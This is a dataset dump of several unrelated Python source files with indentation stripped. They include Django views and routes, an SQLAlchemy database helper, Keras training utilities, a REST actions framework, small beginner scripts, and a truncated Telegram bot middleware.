993,582 | 49a39518ddf2725882de584368f2ae0be357ea09 | from django.contrib import admin
from .models import Soft, Category
admin.site.register(Soft)
admin.site.register(Category)
|
993,583 | cdc23d86ae907d52c34461233fd0cbea4d7adecb | # -*- coding: utf-8 -*-
# Copyright (C) 1994-2019 Altair Engineering, Inc.
# For more information, contact Altair at www.altair.com.
#
# Commercial License Information:
#
# For a copy of the commercial license terms and conditions,
# go to: (http://www.pbspro.com/UserArea/agreement.html)
# or contact the Altair Legal Department.
#
# Use of Altair’s trademarks, including but not limited to "PBS™",
# "PBS Professional®", and "PBS Pro™" and Altair’s logos is subject
# to Altair's trademark licensing policies.
"""
ORMs Library (uses sqlalchemy).
Provide API's to communicate with the Reporting Database(PostgreSQL).
Classes:
* BaseORMLib: Base class for database-related operations
using sqlalchemy.
* Helpers: Helper class for for utility functions.
"""
from datetime import datetime
from sqlalchemy import create_engine, desc
from sqlalchemy.engine.url import URL
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import ProgrammingError, OperationalError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql import text
from sqlalchemy.schema import CreateSchema
from psycopg2.sql import SQL, Identifier
from .exceptions import DatabaseError
BASE = declarative_base()
class BaseORMLib(object):
"""
Deal with database: provide API's for database connection, etc.
Attributes:
*tables (dict) : Dictionary holding the table name mapped to their table class.
*config (dict) : The configuration object for database communication.
*schema (str) : String object holding the schema name.
*create (bool) : Flag used to specify whether to attempt to create table and schema.
*connection_retries(int): Number of times to try connecting to database before
exception is thrown.
Methods:
* _create: Creates schema and table if the don't exist.
* _create_table: Creates table if they don't exist.
* _create_schema: Creates schema if they don't exist.
* _database_engine: Creates a engine from the database configs provided.
* _set_session: Creates a new session which is used to communicate with the
database.
* _reset_session: Closes the old session and creates a new session.
* _commit: Commits changes to the database.
* _rollback: Rolls back the changes in case any exception is encountered.
* _close: Close the Reporting database connection.
* _insert: Performs insert within a transaction.
* _is_session_valid: Checks the session is valid or not.
* _merge_by_query: Performs merge based on the query dictionary.
"""
# pylint: disable=too-few-public-methods
def __init__(self, tables, views, config, schema=None, connection_retries=2):
"""Connect to database, create tables and schema if needed."""
# pylint: disable=too-many-arguments
self.__no_of_retries = connection_retries
self._set_database_engine(config)
self._set_session()
self.exschema = schema
if not self._is_session_valid():
self._reset_session()
if not self._create(tables, views, schema, config):
raise DatabaseError.TableCreationError("Table creation failed. Check logs!")
def _create(self, tables, views, schema_name, config):
"""
Create tables and schemas if they don't exist.
Args:
tables (dict): Dictionary holding the table name mapped to their table class.
{
<table_name_1>: <table_class instance>,
<table_name_2>: <table_class instance>
}
schema_name (str/None): String object holding the schema name.
Returns:
success (bool): True -> if the table and schema creation was successful or
they already exist.
False -> if exception was triggered during table or schema
creation.
"""
if not isinstance(tables, dict):
return False # Raise Exception That Tables Are In A Wrong Format???!!!
success = True
if schema_name is not None:
self._create_schema(schema_name)
for table_name_instance in tables.items():
if self._create_table(table_name_instance[1]) is False:
success = False
break
if isinstance(views, dict):
for view_name_instance in views.items():
if self._create_view(view_name_instance[1], schema_name, config) is False:
success = False
break
return success
def _create_table(self, thistable):
"""
Create table if it doesn't exist, from a class instance.
Args:
thistable (class): Model class of the table to be created.
Returns:
created (bool/Exception): True -> Table created successfully.
False -> Table already exists.
"""
created = True
try:
thistable.__table__.create(self.__engine, checkfirst=True)
self._commit()
return created
except ProgrammingError:
self._rollback()
created = None
raise
except Exception:
self._rollback()
created = False
raise
def _create_schema(self, schema_name):
"""
Create schema if it does not exist.
Args:
schema_name (str): Schema to be created.
"""
try:
if not self.__engine.dialect.has_schema(self.__engine, schema_name):
self.__session.execute(CreateSchema(schema_name))
self._commit()
except Exception:
self._rollback()
self._reset_session()
raise
def _create_view(self, view, schema=None, config=None):
"""
Create view if it doesn't exist.
Args:
view (dict): Name and select statement for the view.
"""
viewname, vschema = view["__tablename__"].split(' ')[0], view["__schema__"].split(' ')[0]
try:
dve = SQL('NULL from {}.{}').format(Identifier(vschema),
Identifier(viewname))
veq = self.__session.query(self._sql_to_string(dve)).limit(1)
self.__session.execute(veq)
self._commit()
except ProgrammingError:
self._rollback()
like = text("information_schema.routines.routine_name like 'crosstab%'")
count = self.__session.query('* FROM information_schema.routines')
count = count.filter(like).count()
if int(count) == 0:
self._create_extension(config)
self.exschema = 'public'
else:
like = text("information_schema.routines.routine_name like 'crosstab%'")
count = self.__session.query('routine_schema FROM'
' information_schema.routines')
count = count.filter(like).limit(1)
count = self.__session.execute(count).fetchone()[0]
self._commit()
self.exschema = count
like = text("SELECT has_schema_privilege(:exschema, 'USAGE')")
like = self.__session.execute(like,
{"exschema": self.exschema}).fetchone()[0]
self._commit()
if not like:
self._grant_access(config)
viewst, raw = self._sql_to_string(view["__statement__"]), '{}.crosstab'
defsch = self._sql_to_string(SQL(raw).format(Identifier(schema)))
exsch = SQL(raw).format(Identifier(self.exschema))
self.__session.execute(viewst.replace(defsch, self._sql_to_string(exsch)))
self._commit()
except Exception:
self._rollback()
self._reset_session()
raise
def _sql_to_string(self, psql):
"""Use raw connection to convert psycopg2 SQL to string."""
pcon = self.__engine.raw_connection()
try:
pcur = pcon.cursor()
xxx = psql.as_string(pcur)
finally:
pcon.close()
return xxx
def _grant_access(self, config):
"""
Grant user access to schema containing tablefunc extension.
Args:
config (dict): Database configuration as a dictionary.
"""
confi = config.copy()
user = confi["username"]
superuse = confi.pop("supdatabase"), confi.pop("supusername"), confi.pop("suppassword")
self.__engine.dispose()
configdef = confi.copy()
configdef["username"] = superuse[1]
configdef["password"] = superuse[2]
engine = create_engine(URL(**configdef))
conn = engine.connect()
try:
conn.execute("commit")
pcon = engine.raw_connection()
try:
pcur = pcon.cursor()
conn.execute(SQL("GRANT USAGE "
"ON SCHEMA {schema} "
"TO {user};").format(schema=Identifier(self.exschema),
user=Identifier(user)).as_string(pcur))
conn.execute("commit")
finally:
pcon.close()
finally:
conn.close()
engine.dispose()
self._set_database_engine(config)
self._set_session()
def _set_database_engine(self, config):
"""
Create a sqlalchemy engine object.
Args:
config (dict): Database configuration as a dictionary.
"""
confi = config.copy()
superuse = confi.pop("supdatabase"), confi.pop("supusername"), confi.pop("suppassword")
self.__engine = create_engine(URL(**confi))
try:
try:
if self.__engine is not None:
conn = self.__engine.connect()
conn.close()
except OperationalError:
configdef = confi.copy()
configdef["database"] = superuse[0]
self.__engine.dispose()
self.__engine = create_engine(URL(**configdef))
try:
conn = self.__engine.connect()
try:
conn.execute("commit")
conn.execute("CREATE DATABASE %s;" % config["database"])
finally:
conn.close()
except OperationalError:
self.__engine.dispose()
raise
self.__engine.dispose()
self.__engine = create_engine(URL(**confi))
except ProgrammingError:
raise
def _create_extension(self, config):
"""Create extension which requires superuser privileges."""
confi = config.copy()
superuse = confi.pop("supdatabase"), confi.pop("supusername"), confi.pop("suppassword")
try:
if confi["username"] is not superuse[1]:
self.__engine.dispose()
configdef = confi.copy()
configdef["username"] = superuse[1]
configdef["password"] = superuse[2]
engine = create_engine(URL(**configdef))
conn = engine.connect()
try:
conn.execute("commit")
conn.execute("CREATE EXTENSION IF NOT EXISTS tablefunc;")
conn.execute("commit")
finally:
conn.close()
engine.dispose()
self._set_database_engine(config)
self._set_session()
else:
conn = self.__engine.connect()
try:
conn.execute("commit")
conn.execute("CREATE EXTENSION IF NOT EXISTS tablefunc;")
conn.execute("commit")
finally:
conn.close()
except ProgrammingError:
raise
def _set_session(self):
"""Create a new sqlalchemy session."""
self.__session = sessionmaker(bind=self.__engine)()
def _reset_session(self):
"""
Close the previous session and start a new one.
Raises:
DatabaseError.ConnectionError
"""
retries = self.__no_of_retries
while retries > 0:
if not self._is_session_valid():
self._close()
self._set_session()
else:
break
retries -= 1
else:
raise DatabaseError.ConnectionError("Connection to database not available!")
def _is_session_valid(self):
"""Check whether the session is valid or not."""
_valid = False
try:
if self.__session is not None:
self.__session.query('1').scalar()
_valid = True
except Exception: # !!!!????!!!!????
self.__session = None
raise
return _valid
def _commit(self):
"""Commit changes to the database."""
if self.__session is not None:
self.__session.commit()
def _rollback(self):
"""Rollback the changes."""
if self.__session is not None:
self.__session.rollback()
def _close(self):
"""Close the existing session."""
if self.__session is not None:
self._rollback()
self.__session.close()
def _merge(self, _object):
"""Perform sqlalchemy.session.merge()."""
self.__session.merge(_object)
def _add(self, _object):
"""Perform sqlalchemy.session.add()."""
self.__session.add(_object)
def _merge_by_query(self, obj_dict):
"""Perform merge based on the query dictionary."""
_res = self.__session.query(obj_dict["class"]).filter_by(**obj_dict["query_dict"]).first()
if _res is None:
self._add(obj_dict["instance"])
else:
if hasattr(obj_dict["instance"], 'attributes') and \
hasattr(obj_dict["instance"], 'p_key'):
for attr in obj_dict["instance"].attributes:
if attr not in obj_dict["instance"].p_key:
setattr(_res, attr, getattr(obj_dict["instance"], attr))
# updating the instance
obj_dict["instance"] = _res
else:
raise AttributeError("Class variable (attributes / p_key) not set for %s" %
(obj_dict["instance"],))
def last_table_ordered_column(self, obj):
"""
Perform query for the first row of table ordered by column.
Args:
obj
Returns:
instance
"""
instance = self.__session.query(obj["class"]).order_by(desc(text(obj["query"]))).first()
return instance
def _insert(self, object_arr):
"""
Perform insert within a transaction.
Args:
object_arr (list): List of objects to be inserted.
[{
"instance": <object_instance_1>,
"mode": "<add/merge>"
},
{
"instance": <object_instance_2>,
"mode": "<add/merge>"
}].
Returns:
None
"""
_object = None
try:
if not self._is_session_valid():
self._reset_session()
for obj in object_arr:
obj.setdefault("mode", "add")
_object = obj["instance"]
if obj["mode"] == "merge":
self._merge(_object)
elif obj["mode"] == "add":
self._add(_object)
elif obj["mode"] == "merge_by_query":
self._merge_by_query(obj)
else:
raise NotImplementedError("Invalid mode: {mode}".format(mode=obj["mode"]))
self._commit()
except DatabaseError.ConnectionError:
raise
except Exception:
self._rollback()
self._reset_session()
raise
class Helpers(object):
"""
Define various utility functions related to database operation.
Methods:
* schema_ref: Concatenates schema to table name
"""
@staticmethod
def schema_ref(schema, table):
"""
Concatenate schema name to table name.
Args:
schema (str): Schema name.
table (str): Table name.
Returns:
(str): Schema_name.Table_name
"""
return schema + '.' + table
@staticmethod
def timestamp_to_iso_format(timestamp):
"""
Convert timestamp, if existing, to UTC ISO format.
Args:
timestamp
Returns:
date&time
"""
if timestamp is None:
return None
return datetime.isoformat(datetime.utcfromtimestamp(int(timestamp)))
|
993,584 | 231e787830b51f72e8c613fa48d85f3c95f653a4 | from django.conf.urls import url,include
from . import views
urlpatterns = [
url(r'^dashboard/client/', views.client_home, name='client_home'),
url(r'^dashboard/worker/(?P<pk>[0-9]+)$',views.service_expand,name='service_expand'),
url(r'^dashboard/worker/profile/', views.update_worker, name='update_worker'),
url(r'^dashboard/worker/add/', views.add, name='add'),
url(r'^dashboard/worker/', views.service_provider_home, name='service_provider_home'),
url(r'^dashboard/transactions/', views.trans, name='trans'),
url(r'^dashboard/bookings/', views.bookings, name='bookings'),
url(r'^dashboard/generate_report/',views.generate_report, name='generate_report'),
]
|
993,585 | eadacb2885e02086ffce686c64719102439418f9 | valor = float(input('Digite o valor do produto desejado: '))
desconto = valor - (valor * (5 / 100))
print('O produto com desconto saiu de R${:.2f} por R${:.2f}.'.format(valor, desconto))
|
993,586 | 655a4b74a3ac446b4d086d42d26be2d3050be7a0 | # Validation of type annotations
import re
from typing import Match
def GetEmailMatch(email) -> Match:
return re.match(r'([^@]+)@example\.com', email)
|
993,587 | 7548f5f7aa1d1ba3f4ae63358236b611ae6363dc | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Mike
# @Contact : yinhuaxi@geotmt.com
# @Time : 2020/1/7 14:22
# @File : __init__.py.py
|
993,588 | 49000cb0aaf831008ab6330b5ff045d43760411a | import requests
URL = 'https://gen-net.herokuapp.com/api/users/{}'
name = input('Digite Nome: ')
response = requests.get(URL.format(name))
print(response.json())
|
993,589 | 5f81a0ffa36ef2ba60bc2bb369ae79454d36f8e5 | import csv
with open('one.csv', 'w', newline='') as file:
writer = csv.writer(file, delimiter='\t')
writer.writerow(['S.No', 'Name', 'Mark']) # Write a single row, single list
rows = [[1, 'A', 2], [2, 'B', 3]]
writer.writerows(rows) # writerows - requires a nested list as in var row
with open('one.csv', newline='') as file:
reader = csv.reader(file, delimiter='\t')
for row in reader:
print(row) # Every data item is converted to a STRING
|
993,590 | 56309534101618ab143e1bf5b67b85f7ddbc1e11 | from tensorflow.keras.preprocessing.image import ImageDataGenerator
import matplotlib.pyplot as plt
from tensorflow.keras.models import *
def init_generators(train_data_dir, validation_data_dir, img_width, img_height, batch_size_train, batch_size_val):
train_datagen = ImageDataGenerator(
rescale=1. / 255,
rotation_range=20,
width_shift_range=0.2,
height_shift_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
val_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size_train,
color_mode='rgb',
class_mode='binary',
shuffle=True)
val_generator = val_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size_val,
color_mode='rgb',
class_mode='binary',
shuffle=True)
return train_generator, val_generator
def plot(history):
# Plot training & validation accuracy values
print(history.history.keys())
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Model accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()
# Plot training & validation loss values
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()
def save_model_structure_to_json(path, model):
json_file = open(path, "w")
json_file.write(model.to_json())
json_file.close()
def load_model_structure_from_json(path):
json_file = open(path, "r")
loaded_model_json = json_file.read()
json_file.close()
return model_from_json(loaded_model_json)
def freeze(model):
for layer in model.layers:
layer.trainable = False
if isinstance(layer, Model):
freeze(layer)
def unfreeze(model):
for layer in model.layers:
layer.trainable = True
if isinstance(layer, Model):
unfreeze(layer)
|
993,591 | 0dde5ab567d8f55ca868c9b3fe3dd81c5e961591 | """Post views."""
#Django
from django.shortcuts import render
# Utilities
from datetime import datetime
posts =[
{
'title': 'Mont Blanc',
'user': {
'name':'Yésica Cortés',
'picture': 'https://picsum.photos/60/60/?image=1027',
},
'timestamp': datetime.now().strftime('%b %dth, %Y - %H:%M hrs'),
'photo': 'https://i.picsum.photos/id/1036/200/200.jpg?hmac=Yb5E0WTltIYlUDPDqT-d0Llaaq0mJnwiCUtxx8RrtVE',
},
{
'title': 'Via Láctea',
'user': {
'name':'Christian Vander Henst',
'picture':'https://picsum.photos/60/60/?image=1005',
},
'timestamp': datetime.now().strftime('%b %dth, %Y - %H:%M hrs'),
'photo': 'https://i.picsum.photos/id/903/200/200.jpg?hmac=lxHKyjlQqAkKyuVGkgUCO_jdWkg3osj3nTuULFHZxH8',
},
{
'title': 'Nuevo auditorio',
'user': {
'name':'Uriel (thepianastist)',
'picture':'https://picsum.photos/60/60/?image=883',
},
'timestamp': datetime.now().strftime('%b %dth, %Y - %H:%M hrs'),
'photo': 'https://i.picsum.photos/id/1076/200/200.jpg?hmac=KTOq4o7b6rXzwd8kYN0nWrPIeKI97mzxBdWhnn-o-Nc',
},
]
def list_posts(request):
"""List existing posts."""
return render(request, 'feed.html', {'posts': posts}) |
993,592 | 607bedbda9ff4333f93798acbcd736421bfc7d29 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ReST actions handlers."""
# System imports
import sys
import abc
import logging
import datetime
import importlib
from django.db import models
from django.conf import settings
from django.utils.timezone import utc
from django.db.models.query import QuerySet
from django.urls import reverse
from rest_framework.authtoken.models import Token
# Project imports
from .handlers import PostMixin, GetMixin, RestAPIBasicAuthView, RestAPINoAuthView
from .request_data import RequestData
from .response_data import ResponseData
from .serializer_object import SerializerModelDataObject
from draalcore.rest.model import ModelContainer, locate_base_module, ModelsCollection, AppsCollection
from draalcore.exceptions import DataParsingError
from draalcore.middleware.current_user import get_current_request
from draalcore.rest.base_serializers import UserModelSerializer
from draalcore.middleware.login import AutoLogout
logger = logging.getLogger(__name__)
def get_module(module):
"""Return specified python module"""
return getattr(sys.modules, module, importlib.import_module(module))
class BaseAction(abc.ABC):
"""
Base class for action execution.
Attributes:
-----------
ACTION
Name of action.
MODEL
Model class. This should be defined for all actions that are derived from CreateAction or
EditAction base action class. It is not needed for CreateAction or EditAction as those
classes are valid for all models as such. Only if there is a need to override the
default behavior, custom class implementation is needed.
ALLOWED_METHODS
Allowed HTTP methods under which action can be called.
LINK_ACTION
True if action URL can be directly called. Useful, for example, for downloading media files.
"""
ACTION = None
MODEL = None
ALLOWED_METHODS = []
LINK_ACTION = False
def __init__(self, request_obj, model_cls):
"""
Parameters:
-----------
request_obj: RequestObject
Request object.
model_cls: Model
Model class for the request.
"""
self._request_obj = request_obj
self._model_cls = model_cls
@classmethod
def create(cls, request_obj):
return cls(request_obj, cls.MODEL)
@property
def request_obj(self):
return self._request_obj
@property
def model_cls(self):
return self._model_cls
@classmethod
def match_action(cls, action):
return cls.ACTION == action
def serialize_user(self, user, auth_data=False):
data = UserModelSerializer(user).data
if auth_data:
data['expires'] = AutoLogout.expires()
data.update(self._get_token(user))
return data
def _get_token(self, user):
token, created = Token.objects.get_or_create(user=user)
if not created:
# Update the created time of the token to keep it valid
token.created = datetime.datetime.utcnow().replace(tzinfo=utc)
token.save()
return {'token': token.key}
class CreateAction(BaseAction):
"""Create new model item, applicable to all models."""
ACTION = 'create'
ALLOWED_METHODS = ['POST']
DISPLAY_NAME = 'Create'
def _execute(self):
"""Create new model item."""
return self.model_cls.objects.create_model(**self.request_obj.data_params)
def execute(self, *args, **kwargs):
return self._execute(*args, **kwargs)
class CreateActionWithParameters(CreateAction):
"""Create action where required input parameters are explicitly defined."""
PARAMETERS = {}
def _validate_parameters(self):
"""Validate data parameters, raise DataParsingError on error"""
errors = []
for key in self.PARAMETERS.keys():
if key not in self.request_obj.data_params:
errors.append(key)
if errors:
raise DataParsingError('Following data items are missing: {}'.format(', '.join(errors)))
for key, params in self.PARAMETERS.items():
params[0].validate_type(key, self.request_obj.data_params.get(key), params[1])
def execute(self, *args, **kwargs):
self._validate_parameters()
return self._execute(*args, **kwargs)
class EditAction(BaseAction):
"""Edit existing model item, applicable to all models."""
ACTION = 'edit'
ALLOWED_METHODS = ['POST', 'PATCH']
def _execute(self, model_obj):
"""Edit model item."""
return self.model_cls.objects.edit_model(model_obj, **self.request_obj.data_params)
def execute(self):
try:
model_obj = self.model_cls.objects.get(id=self.request_obj.kwargs['id'])
except self.model_cls.DoesNotExist:
raise DataParsingError('ID {} does not exist'.format(self.request_obj.kwargs['id']))
return self._execute(model_obj)
class DeleteAction(EditAction):
"""Delete existing model item, applicable to all models."""
ACTION = 'delete'
ALLOWED_METHODS = ['POST']
DISPLAY_NAME = 'Delete'
LINK_ACTION = True
def _execute(self, model_obj):
"""Delete model item by changing its visibility status."""
model_obj.deactivate()
return None
class AbstractModelGetAction(BaseAction):
"""HTTP GET action for models."""
ALLOWED_METHODS = ['GET']
@abc.abstractmethod
def execute(self):
"""Must be defined in the implementing class"""
class AbstractModelItemGetAction(EditAction):
"""HTTP GET action for model item."""
ACTION = None
ALLOWED_METHODS = ['GET']
@abc.abstractmethod
def _execute(self, model_obj):
"""Must be defined in the implementing class"""
def get_action_response_data(obj, url_name, resolve_kwargs, method=None):
"""Return serialized action URL data"""
return {
'url': '{}{}'.format(settings.SITE_URL, reverse(url_name, kwargs=resolve_kwargs)),
'display_name': getattr(obj, 'DISPLAY_NAME', obj.ACTION),
'method': method or obj.ALLOWED_METHODS[0],
'direct': obj.LINK_ACTION
}
class ActionMapper(object):
"""Utility wrapper class for model actions."""
@classmethod
def serialize_actions(cls, request_obj, model_cls, cls_options, method, resolver, include_link_actions=False):
"""
Serialize actions available for model or model item.
Parameters
----------
request_obj
Request object.
model_cls
Model class for the request object.
cls_options:
List of action base classes for model and model item based action processing.
method
HTTP method.
resolver
URL resolver, should contain 'name' and 'kwargs' keys for URL reverse method.
include_link_actions
If True, only those model actions are serialized that have LINK_ACTION attribute set to value True.
Default value is False.
Returns
-------
dict
Available actions.
"""
classes = cls.action_classes(request_obj, model_cls, cls_options, method)
# Is inclusion of all actions required in URL parameters?
all_actions = request_obj.has_url_param('actions', 'all')
# Include actions that do not require input parameters
if not all_actions and include_link_actions:
classes = [item for item in classes if item.LINK_ACTION]
data = {}
for item in classes:
resolver['kwargs']['action'] = item.ACTION
data[item.ACTION] = get_action_response_data(item, resolver['name'], resolver['kwargs'], method)
return data
@classmethod
def action_classes(cls, request_obj, model_cls, cls_options, method):
"""
Return BaseAction inherited action classes for specified model.
Parameters
----------
request_obj
Request object.
model_cls
Model class for the request object.
cls_options:
List of action base classes for model and model item based action processing. If available action
classes are to be retrieved for model ID, then the second item in the list is used as reference class
otherwise the fist item in the list is used. All actions that get accepted to the output list must
have been derived from this reference class.
method
HTTP method that each action class within output list should support.
Returns
-------
list
Action classes for model.
"""
module = locate_base_module(model_cls, 'actions')
target_base_cls = cls_options[0] if 'id' not in request_obj.kwargs else cls_options[1]
try:
classes = []
loaded_mod = get_module(module)
for name, cls in loaded_mod.__dict__.items():
# Class must be inherited from the target class
if target_base_cls and isinstance(cls, type) and issubclass(cls, target_base_cls):
# Class must not be imported
if cls.__module__ != target_base_cls.__module__:
# The model must match that of the target
if cls.MODEL.__name__ == model_cls.__name__ and method in cls.ALLOWED_METHODS:
if cls.ACTION not in getattr(model_cls, 'DISALLOWED_ACTIONS', []):
classes.append(cls)
except ImportError:
pass
# Include the base class if it has action name specified
if target_base_cls and target_base_cls.ACTION and method in target_base_cls.ALLOWED_METHODS:
if target_base_cls.ACTION not in getattr(model_cls, 'DISALLOWED_ACTIONS', []):
classes.append(target_base_cls)
# Include delete action as special action if id present
if 'id' in request_obj.kwargs and method in DeleteAction.ALLOWED_METHODS:
if DeleteAction.ACTION not in getattr(model_cls, 'DISALLOWED_ACTIONS', []):
classes.append(DeleteAction)
return classes
@classmethod
def create(cls, request_obj, model_cls, action, cls_options, method):
"""
Create BaseAction inherited action object instance for specified request.
Parameters
----------
request_obj
Request object.
model_cls
Model class for the request object.
action
Action name.
cls_options:
Action base classes list for model and model item based action processing.
method
HTTP method.
Returns
-------
Object
CreateAction | EditAction instance.
Raises
------
DataParsingError
Action not supported.
"""
# Find action classes for model
classes = cls.action_classes(request_obj, model_cls, cls_options, method)
# Now find the correct action class
for cls_item in classes:
if cls_item.match_action(action):
return cls_item(request_obj, model_cls)
raise DataParsingError('Action {} not supported for method {}'.format(action, method))
class ModelActionMixin(GetMixin, PostMixin):
"""Actions mixin handling HTTP GET and HTTP POST queries for model related actions."""
def _get(self, request_obj):
"""Apply HTTP GET action to application model."""
return self._execute_action(request_obj, [AbstractModelGetAction, AbstractModelItemGetAction], 'GET')
def _post(self, request_obj):
"""Apply HTTP POST action to application model."""
return self._execute_action(request_obj, [CreateAction, EditAction], 'POST')
def _execute_action(self, request_obj, action_cls, method):
"""Execute model action."""
action = request_obj.kwargs['action']
model_cls = ModelContainer(request_obj.kwargs['app'], request_obj.kwargs['model']).model_cls
# Model definition must be valid
if hasattr(model_cls, 'serializer_fields'):
ser_obj = SerializerModelDataObject.create(request_obj, model_cls)
# Locate action class and execute
action_obj = ActionMapper.create(request_obj, model_cls, action, action_cls, method)
obj = action_obj.execute()
# Serialize data as response
if obj and isinstance(obj, (models.Model, QuerySet)):
request_obj.set_queryset(obj)
obj = ser_obj.serialize().data
return ResponseData(obj)
msg = "{} action for '{}' is not supported via the API".format(action, request_obj.kwargs['model'])
return ResponseData(message=msg)
class AppActionMixin(GetMixin, PostMixin):
"""Actions mixin handling HTTP GET and HTTP POST queries for application related actions."""
def _get(self, request_obj):
"""Apply HTTP GET action to application."""
return self._execute_action(request_obj, 'GET')
def _post(self, request_obj):
"""Apply HTTP POST action to application."""
return self._execute_action(request_obj, 'POST')
def _execute_action(self, request_obj, method):
"""Execute application level action."""
# Find application config object
app = AppsCollection().get_app(request_obj.kwargs['app'])
# Find the actual action object
action_obj = app.get_action_obj(request_obj, method)
# Execute
obj = action_obj.execute()
# Serialize returned data if its queryset or model item
if obj and isinstance(obj, (models.Model, QuerySet)):
# Queryset model
model_cls = obj.model
# Create serializer based on model
ser_obj = SerializerModelDataObject.create(request_obj, model_cls)
request_obj.set_queryset(obj)
# Serialize queryset data
obj = ser_obj.serialize().data
return ResponseData(obj)
class ActionsSerializer(object):
"""
Actions serializer interface. Lists available actions for (app_label, model) tuple. If URL contains
'actions' parameter with value 'all', then all available actions are listed. By default only HTTP POST
actions are listed.
Attributes:
-----------
request_obj
RequestData instance.
"""
def __init__(self, request_obj):
self.request_obj = request_obj
def serialize(self):
"""
Interface for serializing application and/or model related actions.
Returns
-------
dict
Action details.
"""
return self._serialize_model_actions() if 'model' in self.request_obj.kwargs else self._serialize_app_actions()
def _serialize_app_actions(self):
"""
Serialize actions that are application related (not tight to any specific model).
Returns
-------
dict
Keys describe the name of action and corresponding value the details of the action.
"""
app = AppsCollection().get_app(self.request_obj.kwargs['app'])
return app.serialize_actions(get_action_response_data, self.request_obj.kwargs.get('noauth', False))
def _serialize_model_actions(self):
"""
Serialize actions that are related to a model.
Returns
-------
dict
Action details.
"""
resolver = {
'name': 'rest-api-model-action',
'kwargs': {
'app': self.request_obj.kwargs['app'],
'model': self.request_obj.kwargs['model']
}
}
get_base_actions = []
if 'id' in self.request_obj.kwargs:
resolver['name'] = 'rest-api-model-id-action'
resolver['kwargs'].update({'id': self.request_obj.kwargs['id']})
# First item needs to be None as the base class for actions search is based on the
# second item when model ID is present.
get_base_actions.append(None)
get_base_actions.append(AbstractModelItemGetAction)
else:
get_base_actions.append(AbstractModelGetAction)
fn = ActionMapper.serialize_actions
model_cls = ModelContainer(self.request_obj.kwargs['app'], self.request_obj.kwargs['model']).model_cls
# List HTTP POST actions by default
actions = fn(self.request_obj, model_cls, [CreateAction, EditAction], 'POST', resolver)
# All actions are requested, include also HTTP GET actions
if self.request_obj.has_url_param('actions', 'all'):
actions.update(fn(self.request_obj, model_cls, get_base_actions, 'GET', resolver, include_link_actions=True))
return actions
@classmethod
def serialize_model_id_actions(cls, model_cls, model_id):
"""
Class method to serialize actions for specified model and model ID. Only those actions are serialized
that require HTTP POST method with no input data and HTTP GET method that have LINK_ACTION set to True.
This function will be called automatically when model item gets serialized. The purpose is that only
those actions will be listed that can be called without specifying input data as part of the HTTP call
(as those allow simple UI side implementation).
Parameters
----------
model_cls
Model class.
model_id
Model ID.
Returns
-------
dict
Action details.
"""
resolver = {
'kwargs': {
'app': model_cls._meta.app_label,
'model': model_cls._meta.db_table,
'id': model_id
},
'name': 'rest-api-model-id-action'
}
request_obj = RequestData(get_current_request(), **resolver['kwargs'])
cls_fn = ActionMapper.serialize_actions
# HTTP POST actions that require no input data
base_action_cls = [None, EditAction]
actions = cls_fn(request_obj, model_cls, base_action_cls, 'POST', resolver, include_link_actions=True)
# HTTP GET actions
base_action_cls = [None, AbstractModelItemGetAction]
actions.update(cls_fn(request_obj, model_cls, base_action_cls, 'GET', resolver, include_link_actions=True))
return actions
class ActionsListingMixin(GetMixin):
"""Actions mixin handling model's actions listing."""
def _get(self, request_obj):
"""Return available actions for the model."""
return ResponseData(ActionsSerializer(request_obj).serialize())
class ModelActionHandler(ModelActionMixin, RestAPIBasicAuthView):
"""ReST API entry point for executing model action"""
pass
class AppActionHandler(AppActionMixin, RestAPIBasicAuthView):
"""
ReST API entry point for executing application level action. Action requires
user authentication.
"""
pass
class AppPublicActionHandler(AppActionMixin, RestAPINoAuthView):
"""
ReST API entry point for executing public application action.
No user authentication required.
"""
pass
class ActionsListingHandler(ActionsListingMixin, RestAPIBasicAuthView):
"""
ReST API entry point for listing actions for application. All actions require
user authentication.
"""
pass
class ActionsPublicListingHandler(ActionsListingMixin, RestAPINoAuthView):
"""
ReST API entry point for listing public actions for application. No user
authentication required for the actions.
"""
pass
class SystemAppsListingHandler(GetMixin, RestAPIBasicAuthView):
"""
ReST API entry point for listing application models and associated actions.
"""
def _get(self, request_obj):
args = request_obj.args
kwargs = request_obj.kwargs
# Available models actions (that are associated to some application)
data = ModelsCollection.serialize()
for item in data:
kwargs['app'] = item['app_label']
kwargs['model'] = item['model']
obj2 = RequestData(request_obj.request, *args, **kwargs)
item['actions'] = ActionsSerializer(obj2).serialize()
# Available application level actions with and without authentication
for app in AppsCollection.serialize(get_action_response_data):
data.append(app)
# UI only application views but enabled from backend
if hasattr(settings, 'UI_APPLICATION_MODELS'):
for item in settings.UI_APPLICATION_MODELS:
for app, _models in item.items():
for model in _models:
data.append({'app_label': app, 'model': model['name'], 'actions': {}})
return ResponseData(data)
class SystemAppsPublicListingHandler(RestAPINoAuthView, SystemAppsListingHandler):
"""
ReST API entry point for listing public APIs.
"""
def _get(self, request_obj):
public_data = []
for item in super(SystemAppsPublicListingHandler, self)._get(request_obj).data:
public_item = item.copy()
public_item['actions'] = {}
for action, action_data in item['actions'].items():
# Include only public actions
if not action_data.get('authenticate', True):
public_item['actions'][action] = action_data
if public_item['actions']:
public_data.append(public_item)
return ResponseData(public_data)
|
993,593 | b14c2b98a07fad5acc877d946f624a0191ab7c48 | from typing import Optional
from aiogram import types
from aiogram.dispatcher.middlewares import BaseMiddleware
from ..models import dbc, User, Chat
class AclMiddleware(BaseMiddleware):
async def setup_chat(self, data: dict, tg_user: types.User, tg_chat: Optional[types.Chat] = None):
user_id = tg_user.id
chat_id = tg_chat.id if tg_chat else tg_user.id
user = await User.get(user_id)
if not user:
user = await dbc.add_new_user(tg_user)
